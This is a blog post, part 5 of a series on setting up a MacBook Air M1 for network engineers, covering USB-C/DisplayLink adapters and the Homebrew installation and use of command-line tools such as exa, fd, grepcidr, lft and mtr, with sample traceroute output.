tag:blogger.com,1999:blog-6903291242827866892024-03-20T23:02:36.622-07:00Hubbard on Networking@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.comBlogger73125tag:blogger.com,1999:blog-690329124282786689.post-80327789265164327992021-05-19T23:00:00.037-07:002022-11-20T21:21:24.337-08:00Apple MacBook Air M1 for Network Engineers Part 5<p>Welcome to part 5! If you haven't read parts 1-4, you can find them here:</p><div style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, Verdana, sans-serif; font-size: 13.2px;">Part 1 can be found at the link below: <br /><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network.html" style="color: #2288bb; text-decoration-line: none;">Apple MacBook Air M1 for Network Engineers Part 1</a></div><div style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, Verdana, sans-serif; font-size: 13.2px;"><br /></div><div style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, Verdana, sans-serif; font-size: 13.2px;"><span style="font-size: 13.2px;">Part 2 can be found at the link below:</span></div><div style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, Verdana, sans-serif; font-size: 13.2px;"><span style="font-size: 13.2px;"><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#powershell">Apple MacBook Air M1 for Network Engineers Part 2</a><br /></span></div><div style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, Verdana, sans-serif; font-size: 13.2px;"><br /></div><div style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, Verdana, sans-serif; font-size: 13.2px;">Part 3 can be found at the link below:<br /><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_77.html" style="color: #2288bb; text-decoration-line: none;">Apple MacBook Air M1 for Network Engineers Part 3</a></div><div style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, Verdana, sans-serif; font-size: 13.2px;"><br /></div><div style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, Verdana, sans-serif; font-size: 13.2px;">Part 4 can be found at the link below:<br /><a href="https://mwhubbard.blogspot.com/2021/04/if-you-have-been-following-along-with.html#LACP" style="color: #2288bb; text-decoration-line: none;">Apple MacBook Air M1 for Network Engineers Part 4</a></div><div style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, Verdana, sans-serif; font-size: 13.2px;"><br /></div><div style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, Verdana, sans-serif; font-size: 13.2px;"><br /></div><h3 style="text-align: left;">So how is the M1 working out?</h3><p>I have been using the M1 as my daily driver for a few months now. It has far exceeded my expectations. The "Instant On" like an iPad still blows me away, battery life is unbelievable, the Retina screen is amazing, memory management is so good I just don't even think about how many applications I have open. </p><p>Recently, I left work, came home, used it for a few hours web browsing, worked on Friday using it for probably 5 hours at three different sites, then Saturday morning I was web browsing and realized that it was at 39% battery! I can't wait until the plague is over and I get to spend 11-14 hours in airports and on planes with it. Oh, wait...</p><p>But it's not perfect! The M1 only has two USB-C Thunderbolt ports and the architecture of the M1 only allows a total of two displays - <i>INCLUDING</i> the Retina display. So even if you purchase two USB-C to HDMI adapters you can only drive one monitor. Since I have two 27" monitors in my home office and two 24" monitors at work this was disappointing. </p><p>But, it turns out the two monitor limit does not apply to DisplayLink monitors. StarTech.com makes a USB-A to DisplayLink adapter that has two DisplayPort ports and Gigabit Ethernet. It drives both monitors no problem and I can still use the Retina display for a total of three monitors. You do have to go to the <a href="https://www.displaylink.com/downloads">Displaylink Downloads page</a> and install the macOS app. </p><p><a href="https://www.startech.com/en-us/cards-adapters/usba2dpgb">USB 3.0 Mini Dock - Dual Monitor USB-A Docking Station with DisplayPort 4K 60Hz Video & Gigabit Ethernet</a><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs0VrdGEfCV-SrMQku-TJyG88ctgPSE55GBpHaVhjJ3PQdRh0887eSbDW8cQtwtmYfVFGq8ZIVLyNqTw8-9HzIplhS0BSGfaBvJwYN_XlT2JwVb5zfomL78HgOj4SxwPrZ61OBV4YqWHE3/s562/Screen+Shot+2021-05-19+at+21.54.56.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="388" data-original-width="562" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs0VrdGEfCV-SrMQku-TJyG88ctgPSE55GBpHaVhjJ3PQdRh0887eSbDW8cQtwtmYfVFGq8ZIVLyNqTw8-9HzIplhS0BSGfaBvJwYN_XlT2JwVb5zfomL78HgOj4SxwPrZ61OBV4YqWHE3/s320/Screen+Shot+2021-05-19+at+21.54.56.png" width="320" /></a></div><p>Of course, being USB-A, you still have to use a USB-C to USB-A adapter. I bought two from Satechi.com that have three USB-A ports and one Gigabit Ethernet adapter. That leaves the second USB-C port available for charging so I can work all day on two monitors and still have two USB-A available and Ethernet. They are very high-quality adapters and I can't recommend them enough. If you sign up at Satechi.com you will get discount coupons in your inbox.</p><p><a href="https://satechi.net/products/type-c-2-in-1-usb-3-1-aluminum-3-port-hub-and-ethernet-port?variant=822360473609">TYPE-C 2-IN-1 USB HUB WITH ETHERNET</a><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5CRYn-Ttph6tKlr580ucE5tExV_O5pWmebSJBsTrTUA_7SxQ7bQhqXFE0v_lvh4jdgtALXpIMkwFj1boAMbsXxp7W97aoWizt-xl76sncOaA-xE53LCJAkAbBh3Xps7GymxDyzQl3iucb/s900/Screen+Shot+2021-05-19+at+21.52.12.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="692" data-original-width="900" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5CRYn-Ttph6tKlr580ucE5tExV_O5pWmebSJBsTrTUA_7SxQ7bQhqXFE0v_lvh4jdgtALXpIMkwFj1boAMbsXxp7W97aoWizt-xl76sncOaA-xE53LCJAkAbBh3Xps7GymxDyzQl3iucb/s320/Screen+Shot+2021-05-19+at+21.52.12.png" width="320" /></a></div><br /><p><br /></p><p>In the field, I have been using another Satechi adapter - USB-C ON-THE-GO MULTIPORT ADAPTER. This one has </p><p></p><ul style="text-align: left;"><li>USB-C PD charging</li><li>Gigabit Ethernet</li><li>4K HDMI, VGA</li><li>USB-A</li><li>USB-C data ports</li><li>micro/SD card readers slots</li></ul><p></p><p>The USB-C to C cable stashes inside the adapter, a really nice feature and it comes with a second, longer USB-C to C cable. I really like it because I can use the USB-C PD port for charging, use Gigabit Ethernet, an external monitor, and a USB-A device while still having the second USB-C port available. Plus, like the other Satechi adapter, it's very solidly built and feels like it will last even getting banged around in my backpack!</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirOv-PtSzc3LW10dseU0QItV6WLt-HyF5MiqQCoyXZLGlbe6EV70ONOO0nrv-ExC8xfF7Ps0gUC36Y0GqTY2ExBEraFoJx_oZEh6rpM8tRMjmDFXzoavMSk3qJgMgV_VzPAS9V2zyAScsd/s1024/usb-c-on-the-go-multiport-adapter-multi-ports-satechi-919891_1024x.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1024" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirOv-PtSzc3LW10dseU0QItV6WLt-HyF5MiqQCoyXZLGlbe6EV70ONOO0nrv-ExC8xfF7Ps0gUC36Y0GqTY2ExBEraFoJx_oZEh6rpM8tRMjmDFXzoavMSk3qJgMgV_VzPAS9V2zyAScsd/s320/usb-c-on-the-go-multiport-adapter-multi-ports-satechi-919891_1024x.jpg" /></a></div><br /><p><br /></p><p>One last accessory that I am loving is an OIKWAN 10ft FTDI USB-C to RJ45 Serial Adapter. I didn't know that you could buy 10' cables but the extra length rocks. Plus, I don't need to put in a dongle just to use a console cable.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizGUIqdhIKrMQ7A5XAXlPs_N52tVqK4Ppv73H-7w7R9N5zE0FzW1h9EUyc1DzT1TbgVO8_zbq3Z6tOghvaRtMebX_4oIGGmwhHOtf4p8H_lLgFvBhIi6jP6i6K4wjK2IMSNGjZ8gFqmjv7/s500/USB-C-Serial.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="291" data-original-width="500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizGUIqdhIKrMQ7A5XAXlPs_N52tVqK4Ppv73H-7w7R9N5zE0FzW1h9EUyc1DzT1TbgVO8_zbq3Z6tOghvaRtMebX_4oIGGmwhHOtf4p8H_lLgFvBhIi6jP6i6K4wjK2IMSNGjZ8gFqmjv7/s320/USB-C-Serial.jpg" width="320" /></a></div><br /><p>I found this Reddit post about USB-Serail chipsets. There is a lot of good information in it.<br /><a href="https://www.reddit.com/r/networking/comments/u8bd9y/usb_serial_with_reliable_macos_m1_support/">serial: With reliable macOS M1 support?</a><br /></p><p><br />At this point, we have a macOS system running Big Sur with a great shell, a great terminal, the development tools needed to automate the network, and a vast collection of dongles! Now we will install and configure the tools that make macOS/Linux so much better than Windows.</p><p>Here is a list of the apps that we will be installing:</p><p></p><ul style="text-align: left;"><li>arp-scan - a command-line tool for system discovery and fingerprinting</li><li>bat - a replacement for cat with colorization</li><li>cdpr - a Cisco Discovery Protocol daemon</li><li><a href="https://mwhubbard.blogspot.com/2021/05/apple-macbook-air-m1-for-network.html#debut">Debut WebCam software</a> - Use an inexpensive endoscope on the m1.</li><li><a href="https://mwhubbard.blogspot.com/2021/05/apple-macbook-air-m1-for-network.html#docker">Docker Desktop for macOS</a></li><li>duf - Disk Usage Free an ncurses interface for disk usage</li><li><a href="https://mwhubbard.blogspot.com/2021/05/apple-macbook-air-m1-for-network.html#exa">exa - a replacement for LS that includes a lot of useful features</a></li><li>grepcidr - grep for IP subnets. A must learn tool</li><li>iPerf3 - An open-source link performance testing tool</li><li>lft - An alternative to Traceroute. Implements numerous network tracing methods and strategies.</li><li>lsusb - the Linux List USB tool. Useful when you want to see what USB devices are connected</li><li>lldp - an lldp daemon for macOS</li><li><a href="https://mwhubbard.blogspot.com/2021/05/apple-macbook-air-m1-for-network.html#mtr">mtr - A network diagnostic tool that combines the functionality of commonly used traceroute and ping programs into a single tool.</a></li><li>sipcalc - a terminal-based IP calculator</li><li>speedtest-cli - a terminal tool that calls the speedtest.net site.</li><li>tcp traceroute - a part of the IP route2 package from Linux. Useful to be able to use tcp instead of ICMP</li><li>tldr - cli interface to the website https://tldr.sh. Curated list of man pages with exmaples</li><li>Watch - Runs command repeatedly, displaying its output and errors</li><li><a href="https://mwhubbard.blogspot.com/2021/05/apple-macbook-air-m1-for-network.html#shellcheck">shellcheck</a> - Linter for shell scripts</li><li><a href="https://mwhubbard.blogspot.com/2021/05/apple-macbook-air-m1-for-network.html#sc-im">sc-im</a> - Display csv files in the terminal. This is great for quickly reviewing csv files</li></ul><p></p><p><br /></p><h3 id="docker" style="text-align: left;">Docker Desktop for macOS</h3><p>Docker Desktop for Apple Silicon is now available for General Availability. You can download it <a href="https://desktop.docker.com/mac/main/arm64/Docker.dmg?utm_source=docker&utm_medium=webreferral&utm_campaign=docs-driven-download-mac-arm64">here.</a></p><p>I recommend that you join the Docker Slack and then watch the <b><i>docker-desktop-mac</i></b> channel.</p><p>Use this link to get to the Docker Slack instance - <a href="https://dockercommunity.slack.com/ssb/redirect">https://dockercommunity.slack.com</a></p><p>The community is very active and they have solved a lot of issues.</p><p>Docker would require a book to go over, I am just going to show how to install the desktop and provide links to some good reference material.</p><h4 style="text-align: left;">References</h4><div style="text-align: left;"><a href="https://forums.docker.com/t/run-x86-intel-and-arm-based-images-on-apple-silicon-m1-macs/117123">Running Intel images on Apple Silicon<br /></a><a href="https://docs.docker.com/desktop/mac/troubleshoot/">Docker page for Troubleshooting<br /></a><a href="https://docs.docker.com/desktop/mac/troubleshoot/#known-issues">Docker page for Known Issues</a><br />https://docs.docker.com/desktop/mac/apple-silicon/</div><div style="text-align: left;"><a href="https://www.youtube.com/watch?v=eGz9DS-aIeY">Network Chuck - you need to learn Docker RIGHT NOW!! // Docker Containers 101</a><br /></div><p><br /></p><h3 id="exa" style="text-align: left;">EXA</h3><div style="text-align: left;">A modern replacement for ls.<br />One of the most common tasks is listing files. Why spend your time squinting at black and white text?</div><div style="text-align: left;"><br />exa is an improved file lister with more features and better defaults. It uses colours to distinguish file types and metadata. It knows about symlinks, extended attributes, and Git. And it’s small, <br />fast, and just one single binary.</div><div style="text-align: left;"><br /></div><h4 style="text-align: left;">Installation</h4><p>brew install exa</p><p>Examples</p><p>List with long, (F) Classify, Tree. </p><p>Classify displays file kind indicators next to file names. </p><p>exa -lFT</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz2HpnTjGcCtueBHggqxnCSSWHPZdaUClPeEKY2i3g2Mj_ous_Oly1pV1b0XgVllwTqjFNFbVjpHG-arzmWQ4E34gcNRV9QWEnj4lmVNEsNNPDYKVEQDaXa3hiEN8jayRPWaaT0HuZQFFq/s1076/Screen+Shot+2021-08-30+at+22.45.09.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="546" data-original-width="1076" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz2HpnTjGcCtueBHggqxnCSSWHPZdaUClPeEKY2i3g2Mj_ous_Oly1pV1b0XgVllwTqjFNFbVjpHG-arzmWQ4E34gcNRV9QWEnj4lmVNEsNNPDYKVEQDaXa3hiEN8jayRPWaaT0HuZQFFq/w442-h224/Screen+Shot+2021-08-30+at+22.45.09.png" width="442" /></a></div><br /><p>exa -lF --group-directories-first</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-XXNQZBhicvFDIZvJAZv9chZ3j65SYDHDDlhGZqlwdT8Y2CHKUGbK3KQaBI3Y6LYNSlVGAINWzUyRG7FbwRSDoBBzZy-qi6XpzZzBUhUDwf5T7bMgEKVaULPf_06iK5TzE0TYxz_Q_71W/s1030/Screen+Shot+2021-08-30+at+22.54.00.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="436" data-original-width="1030" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-XXNQZBhicvFDIZvJAZv9chZ3j65SYDHDDlhGZqlwdT8Y2CHKUGbK3KQaBI3Y6LYNSlVGAINWzUyRG7FbwRSDoBBzZy-qi6XpzZzBUhUDwf5T7bMgEKVaULPf_06iK5TzE0TYxz_Q_71W/w446-h188/Screen+Shot+2021-08-30+at+22.54.00.png" width="446" /></a></div><br /><p>I created an alias for the last command in the .zshrc file.</p><p><b>alias exa1="exa -lFT --group-directories-first"</b></p><p>Now I just have to type "exa1" to execute that long command.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin6QOoUxzDoM2WPYCWtGdJqqsVd8T3BPwi9U2vX0gaJ-hSS46TQ8-dfRUmqw5oHVeE8cTXJt6hNvM0wJHHP0Dg44Z3OEi-kQ_2SaHG5-2AdajTRoLFH5KRaB1JPffJu0SYdFtL8KydRhFL/s1060/Screen+Shot+2021-08-31+at+21.51.40.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="550" data-original-width="1060" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin6QOoUxzDoM2WPYCWtGdJqqsVd8T3BPwi9U2vX0gaJ-hSS46TQ8-dfRUmqw5oHVeE8cTXJt6hNvM0wJHHP0Dg44Z3OEi-kQ_2SaHG5-2AdajTRoLFH5KRaB1JPffJu0SYdFtL8KydRhFL/w465-h241/Screen+Shot+2021-08-31+at+21.51.40.png" width="465" /></a></div><p><br /></p><h4 style="text-align: left;">References</h4><p><a href="https://the.exa.website/">Exa Website</a></p><p><br /></p><h3 style="text-align: left;">fd</h3><p>A replacement for find. This tool is amazing, the readme on GitHub has a lot of examples.</p><p><b>Features</b></p><p></p><ul style="text-align: left;"><li>Intuitive syntax: fd PATTERN instead of find -iname '*PATTERN*'.</li><li>Regular expression (default) and glob-based patterns.</li><li>Very fast due to parallelized directory traversal.</li><li>Uses colors to highlight different file types (same as ls).</li><li>Supports parallel command execution</li><li>Smart case: the search is case-insensitive by default. It switches to case-sensitive if the pattern contains an uppercase character*.</li><li>Ignores hidden directories and files, by default.</li><li>Ignores patterns from your .gitignore, by default.</li><li>The command name is 50% shorter* than find :-).</li></ul><div><br /></div><p></p><h3 style="text-align: left;">Installation</h3><p><b>brew install fd</b></p><p>I'm not sure what program set the colors environment variable, it was set before installing fd, but this is what it looks like</p><p><b>echo $LSCOLORS </b></p><p><b>Gxfxcxdxbxegedabagacad</b></p><p>fd then uses that to color its output</p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPvRXjX0WeJMzFr8aX2Li8NFnBPdm1RvhNWEcjGGR6PVtuTxGv3e032j6dXty139TGu6r_zGwNhgE4Rg_uHtalU6KZh9JxbRxjvVmd-eea9MmDjayJAZ1inub1ITZoZsW2gLzylSo7Et9d/s742/Screen+Shot+2021-10-26+at+23.13.11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="402" data-original-width="742" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPvRXjX0WeJMzFr8aX2Li8NFnBPdm1RvhNWEcjGGR6PVtuTxGv3e032j6dXty139TGu6r_zGwNhgE4Rg_uHtalU6KZh9JxbRxjvVmd-eea9MmDjayJAZ1inub1ITZoZsW2gLzylSo7Et9d/w530-h197/Screen+Shot+2021-10-26+at+23.13.11.png" width="530" /></a></div><br /><p><br /></p><p>There is a companion tool called as-tree that you can pipe the output to and display the results in a tree.</p><p>brew install as-tree</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWLc3b-qigxPU8RGY1xpZ_p0IRuuBSyKT6u-w87LWQfqBmTc5O7gVDeqYHRTFQGuq-hGz2r9Xs-5MTAVHjBZsD1R2p-oXJVvIREi4e6encyXXDk73uGfWs8uQBWq3afTOIUBMnG1a-VJcO/s692/Screen+Shot+2021-10-26+at+23.13.45.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="458" data-original-width="692" height="327" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWLc3b-qigxPU8RGY1xpZ_p0IRuuBSyKT6u-w87LWQfqBmTc5O7gVDeqYHRTFQGuq-hGz2r9Xs-5MTAVHjBZsD1R2p-oXJVvIREi4e6encyXXDk73uGfWs8uQBWq3afTOIUBMnG1a-VJcO/w494-h327/Screen+Shot+2021-10-26+at+23.13.45.png" width="494" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><h3 style="text-align: left;">References</h3><div style="text-align: left;"><a href="https://github.com/sharkdp/fd">FD GitHub repo<br /></a><a href="https://docs.rs/regex/1.0.0/regex/#syntax">FD's regex syntax</a></div><p><br /></p><h3 style="text-align: left;">grepcidr</h3><p>grepcidr can be used to filter a list of IP addresses against one or more Classless Inter-Domain Routing (CIDR) specifications. As with grep, there are options to invert matching and load patterns from a file. grepcidr is capable of efficiently processing large numbers of IPs and networks.</p><p>grepcidr has endless uses in network software, including: mail filtering and processing, network security, log analysis, and many custom applications.</p><p>For detailed instructions and examples, please see the README file or man page. A couple examples of usage:</p><p> grepcidr 2001:db8::/32 logfile</p><p> grepcidr 66.249.64.0/19 access.log</p><div style="text-align: left;"><a href="http://www.pc-tools.net/unix/grepcidr/">Official website</a></div><h3>Installation</h3><p>brew install grepcidr</p><p><b>LLDP</b></p><p><a href="https://github.com/lldpd/lldpd">Git hub repo with documentation</a></p><h3>Installation</h3><p><b>brew install lldp</b></p><p><b><br /></b></p><p><b>LFT</b></p><p>LFT, short for Layer Four Traceroute, is a sort of 'traceroute' that often works much faster (than the commonly-used Van Jacobson method) and goes through many configurations of packet-filters (firewalls). More importantly, LFT implements numerous other features including AS number lookups through several reliable sources, loose source routing, netblock name lookups, et al. What makes LFT unique? LFT is the all-in-one traceroute tool because it can launch a variety of different probes using ICMP, UDP, and TCP protocols, or the RFC1393 trace method.</p><p><a href="https://pwhois.org/lft/">Official website</a> </p><h3>Installation</h3><p>brew install lft</p><p>References</p><p><br /></p>
<p><br /></p><h3 id="mtr" style="text-align: left;">MTR</h3>
<p>This is a tool that runs continuously to ping the target and calculate the path like traceroute. There is a lot to this tool besides just pinging and tracerouting. You can save the output in CSV or JSON format, use IPv6 addresses, etc. You can use "man mtr" to open the man page or see the Tecmint.com article in the reference section.</p><h4 style="text-align: left;">Installation</h4><p>MTR is part of the Homebrew collection. </p><p><b>brew install mtr</b></p><p>The first time I ran mtr I got the error below:</p><div style="text-align: left;">┌─[mhubbard@HP8600-4] - [/private/tftpboot] - <br />└─[$] mtr -4 199.244.248.19 <br />mtr: Failure to start mtr-packet: Invalid argument</div><p>A google search found an issue on the mtr github page. I just had to add "/usr/local/sbin" to the path variable. I included a link in the references on how to do that in case you have the same issue.</p><h4 style="text-align: left;">How to use mtr</h4><p>Example to www.vectorusa.com from my home lab. Note that you will need to use sudo with mtr.</p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #ffaaaa; color: #aa0000;">┌─</span>[mhubbard<span style="color: #9999ff;">@HP8600</span><span style="color: #555555;">-</span><span style="color: #ff6600;">4</span>] <span style="color: #555555;">-</span> [<span style="color: #555555;">/</span>private<span style="color: #555555;">/</span>tftpboot] <span style="color: #555555;">-</span> [<span style="color: #ff6600;">2909</span>]
<span style="background-color: #ffaaaa; color: #aa0000;">└─</span>[<span style="background-color: #ffaaaa; color: #aa0000;">$</span>] sudo mtr <span style="color: #555555;">-</span><span style="color: #ff6600;">4</span> www<span style="color: #555555;">.</span>vectorusa<span style="color: #555555;">.</span>com
HP8600<span style="color: #555555;">-</span><span style="color: #ff6600;">4.</span>local (<span style="color: #ff6600;">192.168</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.142</span>) <span style="color: #555555;">-></span> www<span style="color: #555555;">.</span>vectorusa<span style="color: #555555;">.</span>com <span style="color: #ff6600;">2021</span><span style="color: #555555;">-</span><span style="color: #ff6600;">08</span><span style="color: #555555;">-</span><span style="color: #ff6600;">30</span>T19:<span style="color: #ff6600;">20</span>:<span style="color: #ff6600;">25</span><span style="color: #555555;">-</span><span style="color: #ff6600;">0700</span>
Keys: Help Display mode Restart statistics Order of fields quit
Packets Pings
Host Loss<span style="color: #555555;">%</span> Snt Last Avg Best Wrst StDev
<span style="color: #ff6600;">1.</span> <span style="color: #ff6600;">192.168</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.254</span> <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> <span style="color: #ff6600;">14</span> <span style="color: #ff6600;">4.1</span> <span style="color: #ff6600;">5.7</span> <span style="color: #ff6600;">3.6</span> <span style="color: #ff6600;">25.2</span> <span style="color: #ff6600;">5.6</span>
<span style="color: #ff6600;">2.</span> (waiting <span style="color: #006699; font-weight: bold;">for</span> reply)
<span style="color: #ff6600;">3.</span> dtr01hsprca<span style="color: #555555;">-</span>tge<span style="color: #555555;">-</span><span style="color: #ff6600;">0</span><span style="color: #555555;">-</span><span style="color: #ff6600;">0</span><span style="color: #555555;">-</span><span style="color: #ff6600;">0</span><span style="color: #555555;">-</span><span style="color: #ff6600;">4.</span>hspr<span style="color: #555555;">.</span>ca<span style="color: #555555;">.</span>charter<span style="color: #555555;">.</span>com <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> <span style="color: #ff6600;">14</span> <span style="color: #ff6600;">18.2</span> <span style="color: #ff6600;">16.8</span> <span style="color: #ff6600;">13.1</span> <span style="color: #ff6600;">33.8</span> <span style="color: #ff6600;">5.1</span>
<span style="color: #ff6600;">4.</span> <span style="color: #ff6600;">024</span><span style="color: #555555;">-</span><span style="color: #ff6600;">180</span><span style="color: #555555;">-</span><span style="color: #ff6600;">019</span><span style="color: #555555;">-</span><span style="color: #ff6600;">029.</span>biz<span style="color: #555555;">.</span>spectrum<span style="color: #555555;">.</span>com <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> <span style="color: #ff6600;">13</span> <span style="color: #ff6600;">14.4</span> <span style="color: #ff6600;">15.6</span> <span style="color: #ff6600;">12.3</span> <span style="color: #ff6600;">26.2</span> <span style="color: #ff6600;">3.5</span>
<span style="color: #ff6600;">5.</span> bbr02atlnga<span style="color: #555555;">-</span>bue<span style="color: #555555;">-</span><span style="color: #ff6600;">1.</span>atln<span style="color: #555555;">.</span>ga<span style="color: #555555;">.</span>charter<span style="color: #555555;">.</span>com <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> <span style="color: #ff6600;">13</span> <span style="color: #ff6600;">13.2</span> <span style="color: #ff6600;">22.0</span> <span style="color: #ff6600;">12.7</span> <span style="color: #ff6600;">80.8</span> <span style="color: #ff6600;">19.4</span>
<span style="color: #ff6600;">6.</span> bbr02chcgil<span style="color: #555555;">-</span>tge<span style="color: #555555;">-</span><span style="color: #ff6600;">0</span><span style="color: #555555;">-</span><span style="color: #ff6600;">2</span><span style="color: #555555;">-</span><span style="color: #ff6600;">0</span><span style="color: #555555;">-</span><span style="color: #ff6600;">1.</span>chcg<span style="color: #555555;">.</span>il<span style="color: #555555;">.</span>charter<span style="color: #555555;">.</span>com <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> <span style="color: #ff6600;">13</span> <span style="color: #ff6600;">33.9</span> <span style="color: #ff6600;">19.7</span> <span style="color: #ff6600;">15.5</span> <span style="color: #ff6600;">33.9</span> <span style="color: #ff6600;">5.3</span>
<span style="color: #ff6600;">7.</span> <span style="color: #ff6600;">206.223</span><span style="color: #555555;">.</span><span style="color: #ff6600;">123.156</span> <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> <span style="color: #ff6600;">13</span> <span style="color: #ff6600;">19.2</span> <span style="color: #ff6600;">27.4</span> <span style="color: #ff6600;">16.6</span> <span style="color: #ff6600;">45.4</span> <span style="color: #ff6600;">10.0</span>
<span style="color: #ff6600;">8.</span> <span style="color: #ff6600;">199.60</span><span style="color: #555555;">.</span><span style="color: #ff6600;">103.2</span> <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> <span style="color: #ff6600;">13</span> <span style="color: #ff6600;">15.6</span> <span style="color: #ff6600;">17.0</span> <span style="color: #ff6600;">13.8</span> <span style="color: #ff6600;">24.0</span> <span style="color: #ff6600;">3.0</span></pre></div><p><br /></p><p>In this example, I added "-b" and "-y 0" to display the AS number and IP address:</p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #ffaaaa; color: #aa0000;">┌─</span>[mhubbard<span style="color: #9999ff;">@HP8600</span><span style="color: #555555;">-</span><span style="color: #ff6600;">4</span>] <span style="color: #555555;">-</span> [<span style="color: #555555;">/</span>private<span style="color: #555555;">/</span>tftpboot] <span style="color: #555555;">-</span> [<span style="color: #ff6600;">2909</span>]
<span style="background-color: #ffaaaa; color: #aa0000;">└─</span>[<span style="background-color: #ffaaaa; color: #aa0000;">$</span>] sudo mtr <span style="color: #555555;">-</span><span style="color: #ff6600;">4</span> <span style="color: #555555;">-</span>b <span style="color: #555555;">-</span>y <span style="color: #ff6600;">0</span> www<span style="color: #555555;">.</span>vectorusa<span style="color: #555555;">.</span>com
HP8600<span style="color: #555555;">-</span><span style="color: #ff6600;">4.</span>local (<span style="color: #ff6600;">192.168</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.142</span>) <span style="color: #555555;">-></span> www<span style="color: #555555;">.</span>vectorusa<span style="color: #555555;">.</span>com <span style="color: #ff6600;">2021</span><span style="color: #555555;">-</span><span style="color: #ff6600;">08</span><span style="color: #555555;">-</span><span style="color: #ff6600;">30</span>T19:<span style="color: #ff6600;">34</span>:<span style="color: #ff6600;">00</span><span style="color: #555555;">-</span><span style="color: #ff6600;">0700</span>
Keys: Help Display mode Restart statistics Order of fields quit
Packets Pings
Host Loss<span style="color: #555555;">%</span> Snt Last Avg Best Wrst StDev
<span style="color: #ff6600;">1.</span> AS<span style="background-color: #ffaaaa; color: #aa0000;">???</span> <span style="color: #ff6600;">192.168</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.254</span> (<span style="color: #ff6600;">192.168</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.254</span>) <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> <span style="color: #ff6600;">19</span> <span style="color: #ff6600;">3.7</span> <span style="color: #ff6600;">4.2</span> <span style="color: #ff6600;">3.3</span> <span style="color: #ff6600;">7.8</span> <span style="color: #ff6600;">0.9</span>
<span style="color: #ff6600;">2.</span> (waiting <span style="color: #006699; font-weight: bold;">for</span> reply)
